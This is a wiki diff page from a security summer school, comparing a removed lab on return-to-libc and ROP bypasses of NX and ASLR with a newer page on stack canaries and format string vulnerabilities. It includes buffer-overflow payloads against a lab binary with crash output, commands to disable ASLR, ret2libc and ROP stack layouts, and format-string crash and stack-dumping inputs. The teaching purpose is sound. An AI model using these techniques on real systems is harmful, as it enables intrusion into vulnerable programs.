session:11

Differences

This shows you the differences between two versions of the page.

session:11 [2020/07/08 09:18]
Liza-Elena BABU (78556) [Executable Space Protection]
session:11 [2020/07/19 12:49] (current)
Line 1: Line 1:
-0x08. Return Oriented Programming+====== 0x0A: Information Leaks ======
  
-== Resources+===== Slides =====
  
-[[https://security.cs.pub.ro/summer-school/res/slides/11-return-oriented-programming.pdf|Session 11 slides]]+===== Resources =====
  
-[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-skel.zip|Session's tutorials and challenges archive]]+[[https://security.cs.pub.ro/summer-school/res/slides/10-information-leaks.pdf|Session 10 slides]]
  
-[[https://security.cs.pub.ro/summer-school/res/arc/11-return-oriented-programming-full.zip|Session's solutions]]+[[https://github.com/hexcellents/sss-exploit/tree/master/sessions|Session's tutorials and challenges archive]]
  
 +===== Stack Protection (Canaries) =====
  
-=== Executable Space Protection+The name comes from canaries (birds) that mining workers carried into mines because the birds were affected by deadly gases such as methane before humans were. In our case, stack canaries are used to check whether a buffer overflow of a stack variable resulted in overwriting the return address. The mechanism is based on a (sometimes random) value that is placed on each function's stack, between the local variables and the return address, as the following picture shows. The value is checked in the function's epilogue before executing ''ret'', and if the values do not match, execution is halted. Since the stack grows from higher memory addresses to lower ones, any buffer overflow targeting the return address will also have to overwrite the canary with the right value.
  
-The **executable space protection** is an instance of the **principle of least privilege**, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e., page) can have the following protection levels: READ, WRITE, and EXECUTE. The executable space protection mandates that writable regions should not be executable at the same time.+{{ :session:canary.png?nolink&248 |}}
  
-The mechanism can be (and was) implemented in many different ways, the most common in Linux being:+There are 3 main variations of this mechanism: //random//, //terminator//, and //random XOR//.
  
-**NX bit:** This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is current implementation in 64-bit processors where page table entries are 8-bytes wide.+**Random** canaries are generated when programs start, and are stored in a global variable. The global variable //can// be located in a memory region surrounded by unmapped pages - this protects against information leak attacks (see next section) that dump big memory chunks, since accessing the unmapped pages will trigger a segmentation fault. This first method is a little bit hard to implement because the //crt0.o// code (see note below) has to read ''/dev/random''.
  
-**Physical Address Extension (PAE):** Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processors also adds the NX bit to its page table entries.+The **terminator** canaries contain string termination characters such as ''0x00'', ''CR'', ''LF'', or ''-1''. This is based on the assumption that most buffer overflows happen when string manipulation functions (e.g., ''strcpy()'') are called with bad arguments. An attacker would want to leak the canary value and then use the buffer overflow to overwrite it with the same value. Because string manipulation functions usually stop when they encounter termination characters, it is difficult to use them to write the same value (which contains termination characters) over the canary.
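The effect of a terminator canary can be illustrated with a small simulation. This is only a sketch under stated assumptions: the frame is modelled as a flat byte array (buffer, then canary, then return address), and the names ''frame_init'', ''canary_intact'', ''overflow_with_strcpy'' and the canary bytes are hypothetical, not taken from any real implementation.

```c
#include <assert.h>
#include <string.h>

enum { BUF_LEN = 8, CANARY_LEN = 4, RET_LEN = 4,
       FRAME_LEN = BUF_LEN + CANARY_LEN + RET_LEN };

/* Hypothetical terminator canary: NUL, CR, LF, 0xff (-1). */
static const unsigned char TERMINATOR_CANARY[CANARY_LEN] = { 0x00, 0x0d, 0x0a, 0xff };

/* Simulated frame, low to high addresses: buffer | canary | return address. */
void frame_init(unsigned char frame[FRAME_LEN]) {
    memset(frame, 0, FRAME_LEN);
    memcpy(frame + BUF_LEN, TERMINATOR_CANARY, CANARY_LEN);
    memcpy(frame + BUF_LEN + CANARY_LEN, "\x41\x84\x04\x08", RET_LEN);
}

/* Returns 1 if the canary slot still holds the expected bytes. */
int canary_intact(const unsigned char frame[FRAME_LEN]) {
    return memcmp(frame + BUF_LEN, TERMINATOR_CANARY, CANARY_LEN) == 0;
}

/* Overflows the buffer with strcpy(); returns 1 if the return address changed. */
int overflow_with_strcpy(unsigned char frame[FRAME_LEN], const char *payload) {
    unsigned char saved_ret[RET_LEN];
    assert(strlen(payload) < FRAME_LEN);  /* keep the simulation in bounds */
    memcpy(saved_ret, frame + BUF_LEN + CANARY_LEN, RET_LEN);
    strcpy((char *)frame, payload);       /* stops at the first 0x00 byte */
    return memcmp(saved_ret, frame + BUF_LEN + CANARY_LEN, RET_LEN) != 0;
}
```

A payload that reproduces the canary bytes is cut off by ''strcpy()'' at the embedded ''0x00'', so the return address is never reached. A payload without terminators does reach it, but only by destroying the canary.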
  
-**Emulation:** The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([[http://en.wikipedia.org/wiki/PaX#PAGEEXEC|PaX PAGEEXEC]]), or by using the segmentation mechanism and splitting the address space in half ([[http://en.wikipedia.org/wiki/PaX#SEGMEXEC|PaX SEGMEXEC]]).+The **random XOR** canaries work by applying a XOR-based algorithm that takes both a random number (the canary) and the correct return address as inputs. The attacker has to both obtain the random number and apply the algorithm to the new return address before building the payload.
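A minimal model of the random XOR idea, assuming the simplest possible "algorithm" (a plain XOR of a 32-bit secret with the return address). The function names are hypothetical and real implementations live in compiler-generated prologue and epilogue code, so this only illustrates the reasoning.

```c
#include <assert.h>
#include <stdint.h>

/* Value stored on the stack: the secret mixed with the return address. */
uint32_t xor_canary_make(uint32_t secret, uint32_t ret_addr) {
    return secret ^ ret_addr;
}

/* Epilogue check: recompute from the (possibly overwritten) return address. */
int xor_canary_check(uint32_t stored, uint32_t secret, uint32_t ret_addr) {
    return stored == (secret ^ ret_addr);
}

/* What an attacker who leaked the secret must place in the canary slot
   to make a new return address pass the check. */
uint32_t xor_canary_forge(uint32_t leaked_secret, uint32_t new_ret_addr) {
    uint32_t forged = xor_canary_make(leaked_secret, new_ret_addr);
    assert(xor_canary_check(forged, leaked_secret, new_ret_addr));
    return forged;
}
```

Changing only the return address fails the check, because the stored value no longer matches. Knowing the secret is not enough on its own either: the attacker also has to recompute the stored value for the new address.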
  
 <note> <note>
-This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. +**crt0.o** is a set of initialization routines linked into compiled C programs, and executed before calling ''main()''. [[http://en.wikipedia.org/wiki/Crt0|More details.]]
- +
-    * Slides: [[http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf|Black Hat & DEF CON 2010]] +
-    * Paper: [[http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf|Interpreter Exploitation. Pointer Inference and JIT Spraying]] +
 </note> </note>
  
-There are of course other implementations in different hardening-oriented projects such as: OpenBSD [[http://marc.info/?l=openbsd-misc&m=105056000801065|W^X]], Red Hat [[http://www.redhat.com/magazine/009jul05/features/execshield/|Exec Shield]], PaX (which is now part of [[https://grsecurity.net/|grsecurity]]), Windows Data Execution Prevention ([[http://support.microsoft.com/kb/875352|DEP]]).+The 3 well-known implementations of stack protection are: StackGuard, ProPolice, and StackShield.
  
-=== Bypassing NX+==== StackGuard ====
  
-**ret-to-plt/libc.** You can return to the ''.plt'' section and call library functions that are already linked. You can also call other library functions based on their known offsets. The latter approach assumes no ASLR (see next section), or the possibility of an information leak (will be discussed in the Information Leak session). +The [[https://www.usenix.org/legacy/publications/library/proceedings/sec98/full_papers/cowan/cowan_html/cowan.html|initial implementation]], proposed by Crispin Cowan et al. from Immunix Inc., only protected the return address by pushing the canary value on the stack right after it (at lower addresses in memory, just like in the picture). Follow-up versions also protected the saved registers and base pointer. StackGuard is implemented as a patch for the GCC compiler that modifies GCC's code generation routines for function prologues and epilogues. The prologue pushes the random value onto the stack, while the epilogue contains a short piece of code that checks the value.
- +
-**Return Oriented Programming (ROP).** This is a generalization of the ret-to-* approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. +
- +
-**mprotect().** If the application is using ''mprotect()'' you can easily call it to modify the permissions and include ''PROT_EXEC'' for the stack. You can also call this in a ''ret-to-libc'' attack. You can also ''mmap'' a completely new memory region and dump the shellcode there. +
- +
-<note> +
-Today we will talk about the first 2 methods to bypass NX. **mprotect()** will be introduced in the next sessions. +
-</note> +
- +
-=== Address Space Layout Randomization (ASLR) +
- +
-Address Space Layout Randomization (ASLR) is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for [[http://en.wikipedia.org/wiki/Position-independent_executable|PIE]] binaries.+
  
 <note important> <note important>
-Linux allows 3 options for its ASLR implementation that can be configured using the ''/proc/sys/kernel/randomize_va_space'' file. Writing 0, 1, or 2 to this file results in the following behaviors: +[[http://courses.cs.washington.edu/courses/cse504/10sp/Slides/lecture3.pdf|Presentation]] on the history of StackGuard by Crispin Cowan.
-  * **0**: deactivated +
-  * **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries) +
-  * **2**: random heap too +
 </note> </note>
  
-Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below.+==== StackShield ====
  
-If you disabled ASLR system-wide, re-enable it using (root access is required):+The most notable feature of StackShield, compared to other implementations, is the //Global Return Stack//. This is a separate memory structure where return addresses are pushed as functions are being called. When a function returns, the correct value is copied back to the application stack, thus overwriting any malicious value. //Ret Range Check// is another feature that allows stack smashing detection by copying return addresses from the application stack to a memory region with no write permission; the saved value is compared to the current return address in the function's epilogue.
  
-<code bash> +==== ProPolice ====
-~$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' +
-</code>+
  
-If you disabled ASLR at shell level, simply **close the shell**, for example by issuing the ''Ctrl+d'' keyboard shortcut.+ProPolice, proposed by IBM, started from an implementation similar to StackGuard, but evolved and introduced new features. It is currently the method used by GCC when the ''%%-fstack-protector%%'' compilation flag is used. The ProPolice mechanism reorders local variables based on their types. The following picture shows where each variable should be placed on the stack based on its type, such that various attacks are prevented.
  
-We can easily demonstrate the effects on shared libraries by running ''ldd'' multiple times in a row on a binary such as ''/bin/ls''.+{{ :session:propolice_stack.jpg?nolink&400 |}}
  
-==== PLT and GOT+<note> 
 +GCC supports 3 levels of stack smashing protection: complete (''-fstack-protector-all''), normal (''-fstack-protector''), and strong (''-fstack-protector-strong''). The difference lies in which functions are protected, with the decision being made by looking at what kinds of local variables are used. Details in [[http://lwn.net/Articles/584225/|this]] LWN article. 
 +</note>
  
-ASLR is not the only feature that prevents the compiler and the linker from solving some relocations before the binary is actually running. Shared libraries can also be combined in different ways, so the first time you actually know the address of a shared library is while the loader is running. The ASLR feature is orthogonal to this - the loader could choose to assign addresses to libraries in a round-robin fashion, or could use ASLR to assign them randomly.+Let's compile a small application with GCC's stack protection.
  
-Of course, we might be inclined to have the loader simply fix all relocations in the code section after it loaded the libraries, but this breaks the memory access protection of the ''.text'' section, which should only be **readable** and **executable**.+<file c ssp.c> 
 +void func() { 
 +    char buffer[1337]; 
 +    return; 
 +}
  
-To solve this problem we need another level of indirection: all memory accesses to symbols located in shared libraries will read the actual address from a table, called **Global Offset Table (''.got'')**, at runtime. The loader will populate this table. Note that this can work both for data accesses, as well as for function calls, however function calls are actually using a small stub (i.e., a few instructions) stored in the **Procedure Linkage Table (''.plt'')**.+int main() {
 +    func();
 +    return 0; 
 +}
 +</file>
  
-The PLT is responsible for finding the shared library function address when it is first called (**lazy binding**), and writing it to a GOT entry (note that the function pointers are stored in ''.got.plt''). The following calls use the pre-resolved address. +Compile the file using:
- +
-Let's take a quick look at the code generated for a shared library call. You can use any binary you like, we'll just show an example from one that simply calls ''puts()''.+
  
 <code bash> <code bash>
-~$ objdump --j .text -M intel hello | grep puts       +~$ CFLAGS='-O0 -m32 -fstack-protector' make ssp
-</code> +
-<code text> +
- 80483e4: e8 07 ff ff ff        call   80482f0 <puts@plt>+
 </code> </code>
  
-We can see that the ''.plt'' section will start at address ''0x080482e0'', right where the previous call will jump:+The disassembled code for ''func()'' looks like this:
  
 <code bash> <code bash>
-~$ readelf --sections hello+~$ objdump -M intel -d -j .text ./ssp
 </code> </code>
  
-<code text>+<code objdump>
-... +0804841b <func>: 
-  [12.plt              PROGBITS        080482e0 0002e0 000040 04  AX  0   0 16 + 804841b: 55                    push   ebp 
-...+ 804841c: 89 e5                mov    ebp,esp 
 + 804841e: 81 ec 48 05 00 00    sub    esp,0x548 
 + 8048424: 65 a1 14 00 00 00    mov    eax,gs:0x14 
 + 804842a: 89 45 f4              mov    DWORD PTR [ebp-0xc],eax 
 + 804842d: 31 c0                xor    eax,eax 
 + 804842f: 90                    nop 
 + 8048430: 8b 45 f4              mov    eax,DWORD PTR [ebp-0xc] 
 + 8048433: 65 33 05 14 00 00 00 xor    eax,DWORD PTR gs:0x14 
 + 804843a: 74 05                je     8048441 <func+0x26> 
 + 804843c: e8 af fe ff ff        call   80482f0 <__stack_chk_fail@plt>
 + 8048441: c9                    leave   
 + 8048442: c3                    ret 
 </code> </code>
  
-Let's see what the code there looks like:+We can observe the random value being read from ''gs:0x14'' and placed on the stack below the return address. Let's take a look at this in GDB over multiple runs. Start by creating a small GDB script that can be easily executed multiple times.
  
-<code bash>+<file text canary.gdb>
-~$ objdump -D -j .plt -intel hello | grep -A 3 '<puts@plt>' +set disassembly-flavor intel 
-</code> +file ssp 
- +break *0x804842a 
-<code text> +commands 
-080482f0 <puts@plt>: +p/x $eax 
- 80482f0: ff 25 00 a0 04 08    jmp    DWORD PTR ds:0x804a000 +c 
- 80482f6: 68 00 00 00 00        push   0x0 +end 
- 80482fb: e9 e0 ff ff ff        jmp    80482e0 <_init+0x30> +run 
-</code>+quit 
 +</file>
  
-We see it jumping to a pointer stored at ''0x804a000'' in the data section. Let's check the binary relocations for that location:+Run using:
  
 <code bash> <code bash>
-~$ readelf --relocs hello+~$ gdb -x canary.gdb ssp
 </code> </code>
  
-<code text> +==== Defeating Canaries ====
-... +
-Relocation section '.rel.plt' at offset 0x298 contains 3 entries: +
- Offset     Info    Type            Sym.Value  Sym. Name +
-0804a000  00000107 R_386_JUMP_SLOT   00000000   puts +
-... +
-</code>+
  
-Ok, good, but what is actually stored at this address initially?+This [[http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-silberman/bh-us-04-silberman-paper.pdf|white paper]] covers different attack vectors and how well each of the 3 implementations presented above protects against them. As the paper shows, there are multiple target values that an attacker might want to modify during exploitation, by overflowing buffers stored in different regions of the process. 
  
-<code bash> +For example, the attacker might target: 
-~$ objdump -s -M intel -j .got.plt --start-address=0x0804a000 hello +  * function pointers passed as parameters (pushed onto the stack before calling functions) 
-</code>+  * the return address 
 +  * the old base pointer 
 +  * a plain function pointer (local variable)
  
-<code text> +Buffers could be stored on the stack, on the heap, or in the ''.bss'' section.
-hello:     file format elf32-i386+
  
-Contents of section .got.plt: +<note important> 
- 804a000 f6820408 06830408 16830408           ............ +Note that attacks can also be carried out via indirect pointers. The attacker could target a local stack variable that is later used as a pointer in a write operation, without trying to change the return address directly. If this write can be fully controlled, the attacker can change the return address without even writing over the canary. 
-</code>+</note>
  
-We recognize ''f6820408'' (''0x80482f6'') as being the next instruction in the ''puts@plt'' stub that we disassembled above. Which then pushes 0 in the stack and calls ''0x80482e0''. This is the call to the one-time resolver, and it looks like this:+Besides indirect attacks, stack canaries can also be defeated if the attacker is able to exploit an **information leak** vulnerability.
  
-<code bash> 
-~$ objdump -D -j .plt -M intel hello | grep -A 3 '080482e0' 
-</code> 
  
-<code text> +===== Format String Exploits =====
-080482e0 <puts@plt-0x10>: +
- 80482e0: ff 35 f8 9f 04 08    push   DWORD PTR ds:0x8049ff8 +
- 80482e6: ff 25 fc 9f 04 08    jmp    DWORD PTR ds:0x8049ffc +
- 80482ec: 00 00                add    BYTE PTR [eax],al +
-</code>+
  
-<note> +<note warning
-Going further into the resolver is left as an exercise. You can use GDB to inspect the address in ''0x8049ffc'', and what happens when this jumps there.+In the following, ''top of the stack'' refers to ''high addresses'' (the fixed end), whereas ''bottom of the stack'' refers to ''low addresses'' (the end where values are pushed), contrary to the intuition that the top of the stack is the end at which values are pushed. This means high addresses are drawn upwards, whereas low addresses are drawn downwards (contrary to the ''GDB'' layout of the stack). 
 +This convention comes from the paper [[https://cs155.stanford.edu/papers/formatstring-1.2.pdf|Exploiting Format String Vulnerabilities]], from which the following tutorial was adapted.
 </note> </note>
  
-What's going on here? What's actually happening is //lazy binding//: by convention, when the dynamic linker loads a library, it will put an identifier and resolution function into known places in the GOT. Therefore, what happens is roughly this: on the first call of a function, it falls through to call the default stub, which simply jumps to the next instruction. The identifier is pushed on the stack, the dynamic linker is called, which at that point has enough information to figure out "hey, this program is trying to find the function foo". It will go ahead and find it, and then patch the address into the GOT such that the next time the original PLT entry is called, it will load the actual address of the function, rather than the lookup stub. Ingenious!+The scenario that enables format string vulnerabilities is the direct use of unsanitized user-provided input as a parameter to functions that can perform special operations based on that input. 
 +E.g.:
  
-=== 00. Tutorial - Bypass NX Stack with return-to-libc+<code C> 
 +void print_something(char* user_input) 
 +{
 +    printf(user_input); 
 +}
 +</code>
  
-Go to the ''01-tutorial-ret-to-libc/'' folder in the [[https://security.cs.pub.ro/summer-school/res/arc/09-defense-mechanisms-skel.zip|activities archive]].+vs.
  
-In the previous sessions we used stack overflow vulnerabilities to inject new code into a running process (on its stackand redirect execution to it. This attack is easily defeated by making the stack, together with any other memory page that can be modified, non-executable. This is achieved by setting the NX bit in the page table. +<code C> 
- +void print_something(char* user_input) 
-We will try to bypass this protection for the ''01-tutorial-ret-to-libc/src/auth'' binary in the lab archive. Build the auth program or use the already compiled one. For now, disable ASLR in a new shell: +{ 
- +    printf("%s", user_input); 
-<code> +}
-setarch $(uname -m) -R /bin/bash+
 </code> </code>
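The difference between the two variants can be observed without triggering undefined behaviour by formatting into a buffer and using an input that contains only ''%%''. This is a hedged sketch: the helper names ''format_unsafe'', ''format_safe'' and ''format_demo'' are hypothetical, and compilers may warn about the non-literal format string in the first helper, which is exactly the pattern to avoid.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: user input is interpreted as the format string. */
int format_unsafe(char *out, size_t n, const char *user_input) {
    return snprintf(out, n, user_input);
}

/* Safe pattern: user input is only ever data for a fixed format string. */
int format_safe(char *out, size_t n, const char *user_input) {
    return snprintf(out, n, "%s", user_input);
}

void format_demo(void) {
    char out[32];
    format_unsafe(out, sizeof out, "100%%");
    assert(strcmp(out, "100%") == 0);   /* "%%" was interpreted as a directive */
    format_safe(out, sizeof out, "100%%");
    assert(strcmp(out, "100%%") == 0);  /* input was copied verbatim */
}
```

With an input such as ''%x'' or ''%n'' instead of ''%%'', the unsafe variant would start consuming arguments that were never passed.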
 +==== Format functions ====
 +A number of format functions are defined in the ANSI C standard. More complex functions are built on top of a few basic format functions; some of them are not part of the standard but are widely available.
 +Real family members:
 + * fprintf — prints to a FILE stream
 + * printf — prints to the ‘stdout’ stream
 + * sprintf — prints into a string
 + * snprintf — prints into a string with length checking
 + * vfprintf — print to a FILE stream from a va_arg structure
 + * vprintf — prints to ‘stdout’ from a va_arg structure
 + * vsprintf — prints to a string from a va_arg structure
 + * vsnprintf — prints to a string with length checking from a va_arg structure
  
-Let's take a look at the program headers and confirm that the stack is no longer executable. We only have read and write (RW) permissions for the stack area.+== Relatives: == 
 + * setproctitle — set argv[] 
 + * syslog — output to the syslog facility 
 + * others like err*, verr*, warn*, vwarn*
  
-<note important> +=== Use of format functions === 
-The auth binary requires the ''libssl1.0.0:i386'' Debian package to work. Recompiling it requires ''libssl-dev:i386'', which might remove ''gcc''. So make sure you also install ''gcc'' afterwards.+To understand where this vulnerability is common in C code, we have to examine the purpose of format functions.
  
-You can find ''libssl1.0.0:i386'' Debian package [[https://packages.debian.org/jessie/i386/libssl1.0.0/download | here ]]. +== Functionality == 
-</note>+ * used to convert simple C datatypes to a string representation 
 + * allow to specify the format of the representation 
 + * process the resulting string (output to stderr, stdout, syslog, ...)
  
-<code bash> +== How the format function works == 
-$ checksec 1-random + * the format string controls the behaviour of the function 
-    [...] + * it specifies the type of parameters that should be printed 
-    NX:       NX enabled + * parameters are saved on the stack (pushed)
-    [...] + * saved either directly (by value), or indirectly (by reference)
-</code> +
-For completeness, lets check that there is indeed a buffer (stack) overflow vulnerability. +
-<code> +
-$ python -c 'print "A" * 1357' | ltrace -i ./auth +
-[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...> +
-[0x8048601] malloc(20                                                                           = 0x0804b008 +
-[0x80485df] puts("Enter password: "Enter password:  +
-                                                             = 17 +
-[0x80485ea] gets(c0x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7)                        = 0xbfffee63 +
-[0x8048652] memset(0x0804b008, '\000', 20                                                       = 0x0804b008 +
-[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x41000001)                                       = 0x804b008 +
-[0x41414141] --- SIGSEGV (Segmentation fault) --- +
-[0xffffffff] +++ killed by SIGSEGV +++ +
-</code>+
  
-Check the source file - the buffer length is ''1337'' bytes. There should be a base pointer and the ''main()'''s return address just before it on the stack. There is also some alignment involved, but we can easily try a few lengths to get the right position of the return address. Seems to be ''1337 + 16'' followed by the return address for this case. You can, of course, determine the distance between the buffer's start address and the frame's return address exactly using ''objdump'', but we will leave that as an exercise.+== The calling function == 
 + * has to know how many parameters it pushes to the stack, since it has to do the stack correction when the format function returns
  
-We can now jump anywhere. Unfortunately, we cannot put a shellcode in the buffer and jump into it because the stack is non-executable now. Lets try it with few NOPs. Our buffer's address is ''0xbfffee63'' (see the ''gets()'' call)+=== What exactly is a format string === 
-<code> +A format string is an ASCIIZ string that contains text and format parameters. 
-$ python -c 'print "\x90\x90\x90\x90" + "A" * 1349 + "\x63\xee\xff\xbf"' | ltrace -i ./auth +Example: 
-[0x80484f1] __libc_start_main(0x80486af, 1, 0xbffff454, 0x80486c0, 0x8048730 <unfinished ...> +<code C
-[0x8048601] malloc(20)                                                                            = 0x0804b008 +printf ("The magic number is%d\n", 1911);
-[0x80485df] puts("Enter password: "Enter password:  +
-)                                                              = 17 +
-[0x80485ea] gets(0xbfffee630x8048601, 0x80486af, 0xb7cdecb0, 0xb7cdecb7                       = 0xbfffee63 +
-[0x8048652] memset(0x0804b008, '\000', 20)                                                        = 0x0804b008 +
-[0x8048671] SHA1(0xbfffee63, 137, 0x804b008, 4, 0x90000001)                                       = 0x804b008 +
-[0xbfffee63] --- SIGSEGV (Segmentation fault) --- +
-[0xffffffff] +++ killed by SIGSEGV ++++
 </code> </code>
-Oh, such a bummer! It didn't work. How about we try to jump to some existing code? +The text to be printed is "The magic number is:", followed by a format parameter ("%d"), which is replaced with the parameter (1911) in the output. Therefore the output looks like:
-<code> +<code>The magic number is: 1911</code>
-$ objdump -d auth | grep -A 15 "<check_password>:" +
-080485ec <check_password>: +
- 80485ec: 55                    push   %ebp +
- 80485ed: 89 e5                mov    %esp,%ebp +
- 80485ef: 81 ec 58 05 00 00    sub    $0x558,%esp +
- 80485f5: c7 04 24 14 00 00 00 movl   $0x14,(%esp) +
- 80485fc: e8 9f fe ff ff        call   80484a0 <malloc@plt> +
- 8048601: a3 38 a0 04 08        mov    %eax,0x804a038 +
- 8048606: a1 38 a0 04 08        mov    0x804a038,%eax +
- 804860b: 85 c0                test   %eax,%eax +
- 804860d: 75 18                jne    8048627 <check_password+0x3b> +
- 804860f: c7 04 24 76 87 04 08 movl   $0x8048776,(%esp) +
- 8048616: e8 95 fe ff ff        call   80484b0 <puts@plt> +
- 804861b: c7 04 24 01 00 00 00 movl   $0x1,(%esp) +
- 8048622: e8 99 fe ff ff        call   80484c0 <exit@plt> +
- 8048627: 8d 85 bb fa ff ff    lea    -0x545(%ebp),%eax +
- 804862d: 89 04 24              mov    %eax,(%esp) +
-</code> +
-Lets try ''0x804860f'' such that we print the ''malloc'' failure message. +
-<code> +
-$ python -c 'print "A" * 1353 + "\x0f\x86\x04\x08"' | ltrace -i -e puts ./auth +
-[0x80485df] puts("Enter password: "Enter password:  +
-)                                                              = 17 +
-[0x804861b] puts("malloc failed"malloc failed +
-)                                                                 = 14 +
-[0xffffffff] +++ exited (status 1) ++++
  
-</code> +Some format parameters:
-=== Return Oriented Programming+
  
-{{ :session:rop.png?nolink&600 |}}+^ Parameter      ^ Output       ^ Passed as          ^ 
 +| %d    | decimal(int)     | value        | 
 +| %u    | unsigned decimal (unsigned int)     | value        | 
 +| %x    | hexadecimal (unsigned int)     | value        | 
 +| %s    | string ( char *)     | reference        | 
 +| %n    | number of bytes written so far (int *)     | reference        |
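The conversions from the table can be exercised in one call. A minimal sketch, assuming a hosted C library that supports ''%n'' with a constant format string; the function name ''format_params_demo'' and the sample values are made up for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Formats one value per conversion from the table and returns the
   byte count that %n stored through its pointer argument. */
int format_params_demo(char *out, size_t n) {
    int written = 0;
    assert(out != NULL && n > 0);
    /* %d, %u, %x take values; %s and %n take pointers (references). */
    snprintf(out, n, "%d %u %x %s%n", -5, 42u, 255u, "hi", &written);
    return written;
}
```

Note that ''%n'' is the only conversion here that writes to memory instead of producing output, which is what makes it interesting for exploitation.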
  
-==== Motivation +The '\' character is used to escape special characters. The C compiler replaces each escape sequence with the appropriate character in the binary at compile time. The format functions do not recognize these sequences. In fact, escape sequences have nothing to do with the format functions at all, although the two are sometimes confused, as if the format functions evaluated them.
-In the previous sessions we discussed ''ret2libc'' attacks. The standard attack was to overwrite in the following way:+Example:
-<code> +<code C>
-RET + 0x00:   addr of system +printf ("The magic number is: \x25" "d\n", 23);
-RET + 0x04:   JUNK +
-RET + 0x08:   address to desired command (e.g. '/bin/sh')+
 </code> </code>
 +The code above works because '\x25' is replaced at compile time with '%', since 0x25 (37) is the ASCII value of the percent character. The string literal is split in two because a hexadecimal escape consumes every hex digit that follows it, so ''"\x25d"'' would be read as the single out-of-range escape ''\x25d''.
  
-However, what happens when you need to call multiple functions? Say you need to call f1() and then f2(0xAB, 0xCD)? The payload should be: +==== The stack and its role in format strings ==== 
-<code> +The behaviour of the format function is controlled by the format string. The function retrieves the parameters requested by the format string from the stack. 
-RET + 0x00:   addr of f1 +<code C>
-RET + 0x04:   addr of f2 (return address after f1 finishes) +printf ("Number %d has no address, number %d has: %08x\n", i, a, &a);
-RET + 0x08:   JUNK (return address after f2 finishes: we don't care about what happens after the 2 functions are called) +
-RET + 0x0c:   0xAB (param1 of f2) +
-RET + 0x10:   0xCD (param2 of f2) +
-</code> +
-What if we need to call f1(0xAB, 0xCD) and then f2(0xEF, 0x42)? +
-<code> +
-RET + 0x00:   addr of f1 +
-RET + 0x04:   addr of f2 (return address after f1 finishes) +
-RET + 0x08:   0xAB (param1 of f1)   +
-RET + 0x0c:   0xCD (param2 of f1)  but this should also be 0xEF (param1 of f2) +
-RET + 0x10:   0x42 (param2 of f2+
 </code> </code>
  
-This kind of conflict can be resolved using Return Oriented Programming, a generalization of ''ret2libc'' attacks.+From within the ''printf'' function the stack looks like : 
 +{{ :session:format_string_stack.png?direct&300 |}}
  
-==== NOP analogy +The format function now parses the format string 'A' by reading one character at a time. If the character is not '%', it is copied to the output. If it is, the character following the '%' specifies the type of parameter that 
-While ''ret2libc'' uses functions directly, Return Oriented Programming uses a finer level of code execution: instruction groups. +should be evaluated. The string "%%" has a special meaning: it is used to print the escape character '%' itself. Every other parameter relates to data that is located on the stack.
-Let's explore an example: +
-<code c> +
-int main() +
-+
- char a[16]; +
- read(0, a, 100);+
  
- return 0; +==== What do we control? ==== 
-}+Through supplying the format string we are able to control the behaviour of the format function. We now have to examine what exactly we are able to control, and how to use this control to extend this partial control over 
 +the process to full control of the execution flow. 
 +==== Crash of the program ==== 
 +By utilizing format strings we can easily trigger some invalid pointer access by just supplying a format string like: 
 +<code C> 
 +printf ("%s%s%s%s%s%s%s%s%s%s%s%s");
 </code> </code>
-This code obviously suffers from a stack buffer overflow. The offset to the return address is 28. So dwords from offset 28 onwards will be popped from the stack and executed. +Because '%s' displays memory from an address that is supplied on the stack, where a lot of other data is stored too, chances are high that we read from an illegal, unmapped address. Also, most format function 
-Remember the NOP sled concept from previous sessions? These were long chains of NOP instructions ("\x90") used to pad a payload for alignment purposes.+implementations offer the '%n' parameter, which can be used to write to the addresses found on the stack. If that is done a few times, it should reliably produce a crash, too.
-Since we can't add any new code to the program (NX is enabled), how could we simulate the effect of a NOP sled? Easy! Using return instructions! +==== Viewing the stack ==== 
-<code> +We can show some parts of the stack memory by using a format string like this: 
-# objdump  -d a -M intel | grep $'\t'ret +<code C>
- 80482dd: c3                    ret     +printf ("%08x.%08x.%08x.%08x.%08x\n");
- 804837a: c3                    ret     +
- 80483b7: c3                    ret     +
- 8048437: c3                    ret     +
- 8048444: c3                    ret     +
- 80484a9: c3                    ret     +
- 80484ad: c3                    ret     +
- 80484c6: c3                    ret    +
 </code> </code>
 -Any and all of these addresses will be ok. The payload could be the following: +This works because we instruct the printf function to retrieve five parameters from the stack and display them as 8-digit padded hexadecimal numbers. So a possible output may look like:
 <code> <code>
-RET + 0x00:   0x80482dd +40012980.080628c4.bffff7a4.00000005.08059c04
-RET + 0x04:   0x80482dd +
-RET + 0x08:   0x80482dd +
-RET + 0x0c:   0x80482dd +
-RET + 0x10:   0x80482dd +
-.....+
 </code> </code>
